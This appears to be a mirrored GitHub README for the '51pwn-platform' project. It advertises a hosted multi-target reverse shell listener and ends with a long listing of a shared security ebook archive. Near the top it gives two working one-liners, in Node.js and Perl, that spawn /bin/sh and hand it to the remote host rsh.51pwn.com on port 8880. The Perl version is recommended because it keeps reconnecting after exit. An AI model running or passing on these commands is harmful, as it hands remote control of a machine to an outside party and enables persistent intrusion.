Giter VIP home page Giter VIP logo

51pwn-platform's Introduction

demo

常用

自研、自用的一些小工具分享 Sharing some gadgets developed and used by myself

https://github.com/hktalent/bug-bounty/releases

供应链安全研究、验证结束,相关发现已经报告

Supply chain security research and verification are completed, and relevant findings have been reported xtermjs/xterm.js#4857

Free one id Multi-target web netcat for reverse shell

one id Multi-target 免费的web版本 “nc -lnvp 8880” 支持多客户端回连,通过id关联【请勿用于非法活动】 xx image

  • 1 one id Multi-target concurrency reverse shell

  • 2 setYourId: xxxx_001 ** The id must be sent to the server as soon as the reverse shell connects to the server to facilitate association with your web.(id 必须在reverse shell连接服务器后第一时间发送给服务器,便于和你的web进行关联) ** awesome: It is no longer a simple nc -lnvtp xxx, but can accept several target reverse shells at the same time.(他不再是简单的nc -lnvtp xxx,而是可以同时接受若干目标reverse shell)

  • 2 start your reverse shell *** id is a unique identification and association between you and all reverse shell targets(id 是 唯一标识、关联你与所有reverse shell 目标之前的关联、关系) *** The second line is a json data, which can usually be used to collect the target's environment information and feed it back to the server. Of course you can give feedback {}。 第二行是一个json 数据,通常可以用来收集目标的环境信息,反馈给server。当然你可以反馈一个空的{} Note: A good reverse shell will keep reconnecting to the server even if you type exit 注意:一个优秀的reverse shell会吃重要,即便你输入 exit 也会不断重新连接到服务器

node -e '(function(){ var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); client.connect(8880, "rsh.51pwn.com", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);client.write("YourId\n{}\n");client.write("{}\n") }); return /a/;})();'

*** 特别推荐下面的命令,经过若干 AI 的优化,可以覆盖 90% 以上的服务器上正确运行, 下面的命令明显比上面的更加优化,即便你关闭浏览器,或者输入exit,下面的代码会自动重新上线

  perl -e 'use Socket;while (1) {socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(8880,inet_aton("rsh.51pwn.com")))){print S "YourId\n{}\n";open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");if (fork() == 0){exec("/bin/sh -i");}wait();}};'

"""

51Pwn-Platform

51Pwn Platform

A Big Data Platform for Information Security Practitioners

ContactMe:https://chat.51pwn.com

Channel:51pwn

image

Online

Awesome Hacking Online Encoding, Decoding Platform

https://51pwn.com/51pwn/#/

image

https://51pwn.com/HackTools/

preview_1

image

image

image

image

image

image

demo

点击看大图

img img img img img
image image image image image

How use

捐赠1000元即可享受1年服务

Donation

Wechat Pay AliPay Paypal BTC Pay BCH Pay
paypal [email protected]

51pwn-platform's People

Contributors

hktalent avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar

51pwn-platform's Issues

信息安全电子书【15年的珍藏 1642本信息安全相关电子书】

信息安全电子书【15年的珍藏 1642本信息安全相关电子书】

https://pan.quark.cn/s/3e94f9b94562

点击链接加入群聊【云盘资源分享】:
https://qm.qq.com/q/76tcYFqf6g

Lists

信息安全电子书【15年的积累 1642本信息安全相关电子书】
https://pan.quark.cn/s/3e94f9b94562
更多可入QQ群:981613536

./Framework for Instruction-level Tracing and Analysis of Program Executions (2006).pdf
./Nonblocking Algorithms and Scalable Multicore Programming - ACM (Samy Al Bahra).pdf
./NT Insider - 2017-02.pdf
./Win32 Static Analysis in Python - Ero Carrera - Sabre Security GmbH (Slides).pdf
./Intel 64 and IA-32 Architectures Optimization Reference Manual - December 2017 (248966-039).pdf
./Overplotting - Unified Solutions under Abstract Rendering.pdf
./Hypergraph-Based Anomaly Detection in Very Large Networks - 2007 (silva_willett_tpami07).pdf
./PE Injection Explained.pdf
./26000-windows-meterpreterless-post-exploitation.pdf
./Scheduling, Thread Context and Synchronization - Windows Hardware and Driver Central (2004).pdf
./Kali-Linux-Revealed-1st-edition.pdf
./VPN技术及应用.pdf
./Evaluation of Parallel Design Patterns for Message Processing Systems on Embedded Multicore Systems.pdf
./Introduction to Intel Ethernet Flow Director.pdf
./Topological Transformation Approaches To Database Query Processing (2015).pdf
./CUDA C Programming Guide v8.0 - Design Guide - September, 2016 (PG-02829-001_v8.0).pdf
./渗透测试实用指南(第2版).pdf
./chronicles_of_narnia.pdf
./penetration-testing-with-kali.pdf
./Cache-Oblivious Streaming B-trees.pdf
./Compiler Internals - Exceptions and RTTI - Igor Skorchinsky (Hex-Rays) - Recon 2012.pdf
./20050617-oracle_9i_install_for_linux.pdf
./IEEE 802.3ad Link Aggregation.pdf
./Learning Python Network Programming.pdf
./Misomorphism - A Semiotic Model of Computer Security Circumvention - 2015 (TR2015-768).pdf
./Linear Algebra.pdf
./Oracle 12c - Utilities (E41528-05).pdf
./External Perfect Hashing for Very Large Key Sets - 2007 (cikm07).pdf
./On the Implementation of Minimum Redundancy Prefix Codes (1997).pdf
./Tru64 - Programming Support Tools (ARH9WBTE).PDF
./Linux Symposium 2004 - All.pdf
./How Not To Measure Latency - Gil Tene - LL Summit NYC (12-Nov-2013).pdf
./Implementing Algebraic Effects in C, or, Monads for Free in C - 2017 (algeff-in-c-tr-v2).pdf
./Automate The Boring Stuff With Python.pdf
./Index Internals - Rebuilding the Truth.pdf
./Measuring the Impact of Event Dispatching and Concurrency Models on Web Server Performance Over High-speed Networks.pdf
./Proactor - An Object Behavioral Pattern for Demultiplexing and Dispatching Handlers for Asynchronous Events.pdf
./Oracle 11gr1 Administrator's Guide (b28310).pdf
./Dynamic Storage Allocation - A Survey and Critical Review.pdf
./K - A Rewriting-Based Framework for Computations (rosu-2007-tr-c).pdf
./Lock-free Concurrent Data Structures - 12 Feb 2013 (1302.2757).pdf
./Kernel Debugging with Windbg.pdf
./MISTRAL - Processing Relational Queries Using a Multidimensional Access Method - 2000 - Slides and Comments.pdf
./POSIX Base - Issue 7 - 2013 (C138).pdf
./Training of CC4 Neural Network using Unary and Spread-Unary Inputs (Potluri_okstate_0664M_14453).pdf
./The Cache Performance and Optimizations of Blocked Algorithms - 1991 (lam-asplos91).pdf
./Mobile Computing Research Is a Hornet's Nest of Deception and Chicanery.pdf
./The Robust Beauty of Improper Linear Models in Decision Making - July 1979.pdf
./Evaluation of Rolling Sphere Method Using Leader Potential Concept - A Case Study - 2006 (IT P501-124).pdf
./Scalable Lock-Free Dynamic Memory Allocation (pldi-2004).pdf
./20050321-LVM-2.pdf
./20070830-phpandjsp.pdf
./Exponential Golomb and Rice Error Correction Codes for Generalized Near-Capacity Joint Source and Channel Coding (ExpgECRiceEC).pdf
./black-hat-python.pdf
./Efficient Implementation of Sorting on Multicore SIMD CPU Architecture - VLDB 2008 (1454171).pdf
./Processing Relational Queries Using a Multidimensional Access Method - 2000 (ubtree-comments).pdf
./20060111-dns_bind.pdf
./Constraint Propagation Algorithms for Temporal Reasoning - A Revised Report (vilain-kautz-book).pdf
./kafka_survey_2018.pdf
./The Linux Scheduler - A Decade of Wasted Cores - 2016 (eurosys16-final29).pdf
./Introduction to DPDK - Slides (2015).pdf
./Building a Bw-Tree Takes More Than Just Buzz Words - 2018 (mod342-wangA).pdf
./20081205-rhel4-iscsi.pdf
./Parallel Computation - CSE260 - Lecture 9 - Matrix Multiplication (Fall 2015).pdf
./Aspects Related to Data Access and Transfer in CUDA - Slides - 2014 (TR-2014-09).pptx
./High Performance IO with NUMA Systems in Linux.pdf
./Graphs, Hypergraphs and Hashing (1994).pdf
./Database Fundamentals.pdf
./20140525-SA-for-virtualization.pdf
./Adding Lock Elision to Linux - Slides (2012).pdf
./Persistence Programming Models for Non-Volatile Memory - July, 2015 (HPL-2015-59).pdf
./Oracle 11gr2 Text Reference (e24436).pdf
./Streaming Store Instructions in the Intel Xeon Phi coprocessor - Slides (2012).pdf
./Prefix Sums and Their Applications (10.1.1.128.6230).pdf
./IDA Plug-in Writing in C-C++ - Version 1.1 - Steve Micallef (2009).pdf
./Reasoning about Temporal Relations - A Maximal Tractable Subclass of Allen's Interval Algebra (10.1.1.57.5336).pdf
./Storing a Sparse Table with O(1) Worst Case Access Time - 1984 (fks-perfecthash).pdf
./Finding Frequent Items in Data Streams.pdf
./Debugging Programs that use Atomic Blocks and Transactional Memory (2010).pdf
./Binary Combinatorial Coding (2003).pdf
./Efficient Hash Probes on Modern Processors (icde2007).pdf
./20050817-ldap-1.pdf
./MARX - Uncovering Class Hierarchies in C++ Programs - (NDSS 2017).pdf
./P - Tutorial.pdf
./Reverse-Engineering Instruction Encodings - 2000 (derive-usenix01).pdf
./HexRaysCodeXplorer - Making Object-Oriented RE Easier - Slides (2014).pdf
./AMD64 Architecture Programmer's Manual - Volume 2 - System Programming (24593, r3.25, Jun-2015).pdf
./Assessment of Windows Vista Kernel-Mode Security - Matthew Conover (Symantec).pdf
./The Forgotten Interface - Windows Named Pipes - Gil Cohen - Slides (2017).pdf
./PE Format Walkthrough.pdf
./Performing Advanced Bit Manipulations Efficiently in General-Purpose Processors (hilewitz-PerformingBitManipulations).pdf
./Princeton - Lecture 19 - Virtual Memory.pdf
./Oracle 11gr2 Advanced Application Developer's Guide (e41502).pdf
./How to Test 10G Ethernet - WhitePaper - Spirent (March, 2012).pdf
./Fast Sort on CPUs, GPUs and Intel MIC Architectures - Technical Report - Intel Labs (intel-labs-radix-sort-mic-report).pdf
./MereChristianity_CSL.pdf
./Principles of Distributed Computing.pdf
./Peter Hlavaty - Back To The CORE (syscan2015).pdf
./20060714-linux_cisco_route.pdf
./Exploiting Deferred Destruction - An Analysis of Read-Copy-Update Techniques in Operating System Kernels (RCUdissertation.2004.07.14e1).pdf
./Windows 10 Control Flow Guard Internals (mj0011).pdf
./Fast Scalable Construction of (Minimal Perfect Hash) Functions.pdf
./Intel 64 and IA-32 Architectures Software Developer's Manual - Combined Volumes 1-4 - December 2017 (325462-sdm-vol-1-2abcd-3abcd).pdf
./Tru64 - Assembly (ARH9LCTE).PDF
./Windows and Some Differences from Linux - Slides (Brian Railing).pdf
./MSDN - Emulating Operating System Synchronization (October, 1997).pdf
./2015年新版CISP培训PPTv3.0.zip
./Oracle - Understanding Oracle Locking (Arup Nanda).pdf
./Leveraging Compression in In-Memory Databases - 2012 (dbkda_2012_6_20_30160).pdf
./44319-web-application-security-testing.pdf
./Kernel Patch Tutorial.pdf
./20050817-ldap-3.pdf
./PageRank as a Function of the Damping Factor.pdf
./Networks of Collaborations - Hypergraph Modeling and Visualisation - 4th July, 2017 (1707.00115).pdf
./Kali Linux Revealed 1st edition.pdf
./Lazy Asynchronous IO for Event-Driven Servers.pdf
./LINUX_UI_Spec_V1.pdf
./Unary Negation - 2013 (1309.2069).pdf
./Windows Kernel Internals - Object Manager.pdf
./Interrupts in Linux - Slides (L07-LinuxEvents).pdf
./MGtoolkit - A Python Package for Implementing Metagraphs (2017).pdf
./信息安全标准发展历程.mmap
./Matchings in k-partite k-uniform Hypergraphs.pdf
./20060608-samba.pdf
./Intel 64 and IA-32 Architectures Optimization Reference Manual - April 2018 (248966-040).pdf
./Sequent Calculus as a Compiler Intermediate Language - ICFP (2016).pdf
./SIMD Compression and the Intersection of Sorted Integers (simdcompressionarxiv).pdf
./Stratified B-trees and Versioning Dictionaries - 30 March 2011 (1103.4282v2).pdf
./Abstract Rendering - Out-of-core Rendering for Information Visualization (2014).pdf
./palmer.pdf
./Vectorized Bloom Filters for Advanced SIMD Processors (damon14).pdf
./A Dynamic Perfect Hash Function Defined by an Extended Hash Indicator Table - 1984 (P245).PDF
./example_hashes [hashcat wiki].pdf
./Object-relative Addressing - Compressed Pointers in 64-bit Java Virtual Machines (P107_134).pdf
./KMDF - How To Develop Framework Drivers - Microsoft - Slides (2007).pdf
./Multi-Core, Main-Memory Joins - Sort vs. Hash Revisited - 2014 (p85-balkesen).pdf
./A Scalable and Explicit Event Delivery Mechanism for UNIX.pdf
./PS4 Toolchain - 2013.pdf
./Ten Lessons I Wish I Had Learned Before I Started Teaching Differential Equations.pdf
./Big Data - New Tricks for Econometrics.pdf
./Investigation of Hardware Transactional Memory - 2015 (Andrew-Nguyen-Thesis).pdf
./AMD64 Architecture Programmer's Manual - Volume 4 - 128-Bit and 256-Bit Media Instructions (26568, r3.19, Jun-2015).pdf
./A Sense of Self for Unix Processes - 1996 (ieee-sp-96-unix).pdf
./Perfect Matchings in 4-uniform hypergraphs (1st Feb, 2011).pdf
./Windows 10 Internals.pdf
./20050321-LVM-1.pdf
./Outlier Detection (2005).pdf
./Beyond Block IO - Rethinking Traditional Storage Primitives (ouyangx-hpca2011).pdf
./Writing R Extensions.pdf
./Windows - Disk Subsystem Performance Analysis (March 2004).pdf
./Data Compression Techniques - Lecture 5 - Adaptive Prefix-Free Coding - University of Helsinky - Slides (2015).pdf
./NVIDIA GPU Computing Webinars - CUDA Memory Optimization (2011).pdf
./Dueling UNIXes and the UNIX Wars (login_apr15_17_salus.pdf).pdf
./20051115-digital_ca.pdf
./Proving the Correctness of Nonblocking Data Structures - ACM (p30-desnoyers).pdf
./高级Bash脚本编程指南.pdf
./Everything You Always Wanted to Know About Synchronization but Were Afraid to Ask (p33-david).pdf
./When Prefetching Works, When It Doesn't, and Why - ACM, 2012 (lee_taco12).pdf
./PyParallel - How We Removed The GIL And Exploited All Cores - (PyData NYC, 2013).pdf
./Derivability, Consistency (rj599).pdf
./Concurrent Hash Tables - Fast and General - 2016 (1601.04017v2).pdf
./On-the-Fly Garbage Collection - An Exercise in Cooperation - Dijkstra (1978).pdf
./Efficient Exploitation of Parallelism on Pentium III and Pentium 4 Processor-Based Systems - 2001 (art_6).pdf
./Fundamentals of Deep Learning of Representations - 2014 (Tel-Aviv-7nov2014).pdf
./Paper - The Zephyr Abstract Syntax Description Language.pdf
./Introduction to Debugging the FreeBSD Kernel -BSDCan 2008.pdf
./20090107-ext2_test.pdf
./Secrets+of+Super+and+Professional+Hackers.zip
./The Design of a High-Performance File Server - 1989 (10.1.1.38.5481).pdf
./Tesla - GPU Computing - Past, Present and Future - Slides (2011).pdf
./Draw Me A Local Kernel Debuger - Slides (2015).pdf
./ELF Format.pdf
./Tuning a Database Reorganization for Maximum Speed (Quest Software).pdf
./PLWAH+ - A Bitmap Index Compressing Scheme - 2014 (jcao_c_plwah).pdf
./Finding Minimal Perfect Hash Functions - 1986 (10.1.1.144.9650).pdf
./The Probabilistic Relevance Framework - BM25 and Beyond.pdf
./Xorshift RNGs - George Marsaglia (2003).pdf
./Oracle PLSQL Coding Guidelines (Top Coder, 2006).pdf
./Microsoft Portable Executable and Common Object File Format Specification - 1999 (pecoff).doc
./Agner Fog - C++ vector class library (2013).pdf
./Efficient Virtual Memory for Big Memory Servers (isca13_direct_segment).pdf
./Assessing the Relationship between Software Assertions and Code Quality - An Empirical Investigation (tr-2006-54).pdf
./Taming Win32 Threads with Static Analysis - Slides (08161-yangjasonyue-slides).pdf
./Spectre Attacks - Exploiting Speculative Execution (2018).pdf
./Intel - Unleash the Power of AVX-512 through Architecture, Compiler and Code Modernization - Slides - September 2012 (2016-PACT-Intel-AVX512-Tutorial-v3.0).pdf
./IBM DB2 for i - Indexing Methods and Strategies.pdf
./The AWK Programming Language (1988).pdf
./Branch Prediction with Neural Networks - Hidden layers and Recurrent Connections.pdf
./Oracle 11gr1 Data Cartridge Developer Guide (b28425).pdf
./信息安全管理.doc
./20101118-How_to_make_a_pc-cluster_system_by_opensu.pdf
./A Tool for the Symbolic Execution of Linux Binaries - PySymemu (Slides).pdf
./20050817-ldap-2.pdf
./Suffix Trees - Slides (Ben Langmead, Johns Hopkins).pdf
./Oreilly.JavaScript.The.Definitive.Guide.6th.Edition.Apr.2011.pdf
./Windows Kernel Internals - Overview.pdf
./On Hamilton Cycle Decompositions of r-uniform and r-partite Hypergraphs.pdf
./A File Comparison Program - 1985 (10.1.1.189.70).pdf
./Optimizing and Interfacing with Cython - Slides - 2010 (cours_cython).pdf
./Mach - A New Kernel Foundation for UNIX Developers (accetta86).pdf
./ZeroMQ.pdf
./Windows Kernel Internals - Cache Manager.pdf
./Better with Fewer Bits - Improving the Performance of Cardinality Estimation of Large Data Streams (INFOCOM2017).pdf
./Adaptive Insertion Policies for High Performance Caching (ISCA-2007-Qureshi-SetDuelingControl).pdf
./Less Hashing, Same Performance - Building a Better Bloom Filter - 2008 (10.1.1.152.579).pdf
./Optimizing Parallel Prefix Operations for the Fermi Architecture.pdf
./Understanding the Python GIL - David Beazley (2010).pdf
./Checking System Rules Using System-Specific, Programmer-Written Compiler Extensions (mc-osdi).pdf
./Matchings in k-partite k-uniform Hypergraphs (Feb 17th, 2018).pdf
./20060310-https.pdf
./Linked List Problems - Stanford (2002).pdf
./Foundations of Data Science (June, 2016).pdf
./Digital FX32 - Running 32-bit x86 Applications on Alpha NT.pdf
./The Linux Kernel Hidden Inside Windows 10 - Alex Ionescu - Slides - Black Hat 2016.pdf
./A Few Billion Lines of Code Later - Using Static Analysis to Find Bugs in the Real World - ACM - 2010 (BLOC-coverity).pdf
./Pythran - Enabling Static Optimization of Scientific Python Programs.pdf
./On the de Bruijn-Newman Constant (2009).pdf
./The Dark Side of Winsock (DC_13-Levin).pdf
./Answering Reachability Queries on Large Directed Graphs - INF-SCR-10-10 (September, 2010).pdf
./A study of code abstraction (Patrick Lambert - Oct 15th, 2014).pdf
./A Framework for Building Extensible C++ Class Libraries - 1993.pdf
./QuickThread - Comparative analysis between QuickThread and Intel Threading Building Blocks (2009).pdf
./SIMD Compression and the Intersection of Sorted Integers - 2015 (1401.6399v12).pdf
./Efficient Implementation of Lazy Suffix Trees (gie-kur-sto-2003).pdf
./Pseudo-Random Number Generators for Vector Processors and Multicore Processors - Agner Fog (2015).pdf
./MSDN - Writing Scalable Applications for Windows NT (Revision 1.0 June 6, 1995).pdf
./Computer Systems Research.pdf
./Why Rust (2015).pdf
./Idle Connection Resiliency.docx
./Backward Search FM-Index (Full-text Index in a Minute Space) - Slides.ppt
./.DS_Store
./Fundamentals of Learning (2015).pdf
./SALSA - Scalable and Low Synchronization NUMA-aware Algorithm for Producer-Consumer Pools (spaa049-gidron).pdf
./Codes for Positive Integers - CS423, Lecture 6, McGill (2008).pdf
./Convex Optimization (2009).pdf
./Using non-volatile memory (NVDIMM-N) as byte-addressable storage in Windows Server 2016 (P470).pdf
./Longest Common Extension with Recompression - 16th Nov 2016 (1611.05359).pdf
./Incremental Construction of Minimal Acyclic Finite State Automata and Transducers.pdf
./How to use Event Tracing for Windows for Performance Analysis.ppt
./Printing Floating-Point Numbers - An Always-Correct Method (fp-printing-popl16).pdf
./Go 1.5 Concurrent Garbage Collector Pacing.pdf
./Canopy - An End-to-End Performance Tracing and Analysis System - 2017 (sosp17-final14).pdf
./A Brief Introduction to Neural Networks (neuronalenetze-en-zeta2-2col-dkrieselcom).pdf
./20101020-pxe_ks_2.pdf
./MSDN - Writing Windows NT Server Applications in MFC Using IO Completion Ports (September, 1996).pdf
./UNIX Time Sharing System - UNIX Programmer's Manual - Seventh Edition, Volume 2B - January, 1979 (v7vol2b).pdf
./20050321-RHEL_High-Availablility-solution_1.pdf
./Generating Sequences With Recurrent Neural Networks (1308.0850v5).pdf
./Improving Python's Memory Allocator - Evan Jones (2005).pdf
./Cache and IO Efficient Algorithms.pdf
./Oracle - x86 Assembly Reference Manual (817-5477).pdf
./Initial End-to-End Performance Evaluation of 10-Gigabit Ethernet - 2003 (hoti03).pdf
./TCSP-密码技术原理.pdf
./Kam1n0 - MapReduce-based Assembly Clone Search for Reverse Engineering - 2016 (DFC16kdd).pdf
./Oracle - Tips and Techniques for Statistics Gathering (Arup Nanda).pdf
./Fast and Space Efficient Trie Searches - Phil Bagwell - ACM.pdf
./20050408-RHEL4.pdf
./Network Stack Challenges at Increasing Speeds - The 100Gbs Challenge - RedHat 2015.pdf
./Oracle 11gr2 PLSQL Language Reference (e25519).pdf
./Program Analysis with PREfast & SAL - Slides (3_StaticAnalysisPREfast).pdf
./标准/BS25999-1-cn.pdf
./标准/ProfessionalPractices(V1.00).pdf
./标准/BCLE2000-Preface.pdf
./标准/14-信息安全技术 信息安全风险评估规范.pdf
./标准/ISO IEC 17799:2005.pdf
./标准/Disaster_recovery.pdf
./标准/BCP_Guidelines10Jan03(v1.00).pdf
./标准/等级保护标准/32-信息安全技术 信息系统安全管理测评.pdf
./标准/等级保护标准/%BA%94用软件系统安全等级保护通用测试指南.pdf
./标准/等级保护标准/%AF 入侵检测系统技术要求和测试评价方法.pdf
./标准/等级保护标准/20-信息安全技术 服务器安全技术要求.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护基本模型.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护实施指南.pdf
./标准/等级保护标准/%A1息安全技术 信息安全事件分类分级指南.pdf
./标准/等级保护标准/%80术 信息系统安全等级保护测评过程指南.pdf
./标准/等级保护标准/7-信息系统等级保护安全设计技术要求.pdf
./标准/等级保护标准/共基础设施 PKI系统安全等级保护技术要求.pdf
./标准/等级保护标准/Symantec-The-Power-To-Destroy-WhitePaper-APAC2014.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护测评要求.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护基本配置.pdf
./标准/等级保护标准/%89全技术 信息系统安全保护等级定级指南.pdf
./标准/等级保护标准/12-信息安全技术 信息系统安全管理要求.pdf
./标准/等级保护标准/Symantec-Knowledge-Is-Power-WhitePaper-APAC2014.pdf
./标准/等级保护标准/%AF安全技术 网络脆弱性扫描产品技术要求.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护体系框架.pdf
./标准/等级保护标准/19-信息安全技术 虹膜识别系统技术要求.pdf
./标准/等级保护标准/8-信息安全技术 网络基础安全技术要求.pdf
./标准/等级保护标准/%A1息安全技术 信息系统物理安全技术要求.pdf
./标准/等级保护标准/21-信息安全技术 操作系统安全技术要求.pdf
./标准/等级保护标准/18-信息安全技术 路由器安全技术要求.pdf
./标准/等级保护标准/信息全技术 防火墙技术要求和测试评价方法.pdf
./标准/等级保护标准/%AF安全技术 数据库管理系统安全技术要求.pdf
./标准/等级保护标准/%AF 网络和终端设备隔离部件安全技术要求.pdf
./标准/等级保护标准/%BA%94用软件系统安全等级保护通用技术指南.pdf
./标准/等级保护标准/17-信息安全技术 信息系统灾难恢复规范.pdf
./标准/等级保护标准/1-计算机信息系统 安全等级保护划分准则.pdf
./标准/等级保护标准/%89全技术 信息系统安全等级保护基本要求.pdf
./标准/等级保护标准/息技术 安全技术 信息安全事件管理指南.pdf
./标准/等级保护标准/%A1息安全技术 信息系统安全工程管理要求.pdf
./标准/等级保护标准/%A1息安全技术 信息系统安全通用技术要求.pdf
./标准/csirt-handbook.pdf
./标准/BS25999-2-cn.pdf
./标准/GBT 26333-2010 工业控制网络安全风险评估规范.pdf
./标准/IATF_中文版/IATF_中文版.pdf
./标准/IATF_中文版/IATF3.0-《信息保障技术框架》.doc
./标准/IATF_中文版/IATF3.1/IATF3.1.rar
./标准/IATF_中文版/IATF3.1/IATF3.1/appJ.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appH.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05s5.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05s4.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appI.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/FntMatter.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch07s2.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/0exsum.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05s1.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05s3.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch07s1.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05s2.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s7.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch03.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch02.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/介绍/信息保障技术框架.txt
./标准/IATF_中文版/IATF3.1/IATF3.1/介绍/IATF在档案信息安全中的应用.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/介绍/什么是IATF.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s6.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s4.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch01.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s5.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s1.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch05.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch10.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch04.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/sumchgs.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s2.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch07.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch06s3.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch08s1.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch08s2.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch09.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/ch08.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appB.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appC.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appA.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appD.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appE.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appG.doc
./标准/IATF_中文版/IATF3.1/IATF3.1/appF.doc
./标准/IATF_中文版/IATF3.1.rar.txt
./标准/IATF_中文版/IATF_中文版1.pdf
./标准/ISO IEC 27001:2005.pdf
./标准/BCI_GPG2008_BCM最佳实践指南_V1.0(中文版).pdf
./标准/pci_dss_chinese_simplified/PCI_DSS_v3_ROC_Reporting_Templatev1.1.pdf
./标准/pci_dss_chinese_simplified/pci_dss_chinese_simplified.pdf
./标准/pci_dss_chinese_simplified/Prioritized_Approach_v3.xlsx
./标准/Disaster Recovery Plan.pdf
./标准/SP800-82-final.pdf
./标准/pgar30_buscont_ebook_chap1.pdf
./标准/《信息系统灾难恢复的规划及实施》.pdf
./标准/ISO31000.pdf
./标准/SP800/NIST-SP800-35.pdf
./标准/SP800/NIST.SP.800-61r2.pdf
./标准/SP800/2001-SP800-26 Security Self-Assessment Guide for Information Technology Systems.pdf
./标准/SP800/sp800-34.pdf
./标准/SP800/sp800-34-rev1_errata-Nov11-2010.pdf
./标准/SP800/fips-197.pdf
./标准/SP800/SP800-100-Mar07-2007.pdf
./标准/SP800/sp800-18-Rev1-final.pdf
./标准/SP800/SP800-64-Revision2.pdf
./标准/SP800/NIST.FIPS.186-4.pdf
./标准/SP800/SP800-27-RevA.pdf
./标准/SP800/sp800_30_r1.pdf
./标准/SP800/nist_sp800-144 Guidelines on Security and Privacy in Public Cloud Computing.pdf
./标准/SP800/fips1401.pdf
./标准/SP800/NIST-SP800-14.pdf
./标准/SP800/sp800-10.pdf
./标准/SP800/NIST 800-55.doc
./标准/SP800/sp800-33_IT安全基础技术模型_(中文版).pdf
./标准/SP800/fips201_2_2012_draft_comments_and_dispositions.pdf
./标准/SP800/sp800-34(v1.02)_cn.pdf
./标准/SP800/800-53-rev3-IPD.pdf
./标准/SP800/800-53-rev3-markup-02-05-2009.pdf
./标准/SP800/fips201_2_2011_draft_comments_and_dispositions.pdf
./标准/SP800/NIST.FIPS.201-2.pdf
./Chord - A Scalable Peer-to-peer Lookup Service for Internet Applications (2001).pdf
./Fundamentals of COM(+) - Part 1 - Slides - Don Box.pdf
./JavaScript - ECMA-262 Standard (v5.1, 2011).pdf
./Binary Coding (2017).pdf
./x86 Intrinsics Cheatsheet v2.2.pdf
./Perfect matchings in r-partite r-graphs.pdf
./AMD64 Architecture Programmer's Manual - Volume 3 - General-Purpose and System Instructions (24594, r3.21, Oct-2013).pdf
./DI-MMAP - A High Performance Memory Map Runtime for Data-Intensive Applications (Nov 16 2012) - Deck.pdf
./Rewriting History - USC FBE Finance Seminar - (F_2-15-07_MALLOY-Anonymous).pdf
./Stratified Synthesis - Automatically Learning the x86-64 Instruction Set - 2016 (pldi16-strata).pdf
./Performance Analysis of BSTs in System Software - 2004 (libavl).pdf
./PE File Structure.pdf
./Bash Shell 编程.pdf
./calling-shell-commands-from-plsql-1-1-129519.pdf
./A Case Study in Optimizing HTM-Enabled Dynamic Data Structures - Patricia Tries (2015).pdf
./How Microsoft Builds Software (1997).pdf
./Fast Sorting Algorithms using AVX-512 on Intel Knights Landing - 24 Apr 2017 (1704.08579).pdf
./Remote Library Injection (April 6th 2004).pdf
./Component Object Model - An Overview and Practical Implementation (IJSARTV3I38438636248891114924768).pdf
./Algorithms for Routing Lookups and Packet Classification - PhD Thesis (Pankaj Gupta, 2000).pdf
./Hacking+attacks+and+Examples+Test.zip
./The RecordLinkage Package - Detecting Errors in Data.pdf
./A Course in Machine Learning (ciml-v0_9-all).pdf
./Unmixed d-uniform and r-partite Hypergraphs - 2016 (1605.02655).pdf
./Inline Function Expansion for Compiling C Programs - 1989 (p246-chang).pdf
./Scrambled Linear Pseudorandom Number Generators.pdf
./Faster Base64 Encoding and Decoding Using AVX2 Instructions v4 (2018) (1704.00605).pdf
./Cache-Oblivious Algorithms and Data Structures (Demaine, 2002).pdf
./20070416-transparent_firewall.pdf
./Overlapping Matrix Pattern Visualization - A Hypergraph Approach (2008).pdf
